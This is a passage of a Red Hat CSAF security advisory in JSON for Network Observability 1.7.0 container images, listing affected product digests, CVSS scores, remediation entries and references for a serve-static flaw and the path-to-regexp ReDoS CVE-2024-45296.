"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8014"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "serve-static: Improper Sanitization in serve-static"
},
{
"cve": "CVE-2024-45296",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2024-09-09T19:20:18.127723+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2310908"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in path-to-regexp package, where it turns path strings into regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. Because JavaScript is single-threaded and regex matching runs on the main thread, poor performance will block the event loop and lead to a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "path-to-regexp: Backtracking regular expressions cause ReDoS",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45296"
},
{
"category": "external",
"summary": "RHBZ#2310908",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310908"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45296",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45296"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f",
"url": "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6",
"url": "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j",
"url": "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j"
}
],
"release_date": "2024-09-09T19:15:13.330000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-22T01:05:39+00:00",
"details": "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8014"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
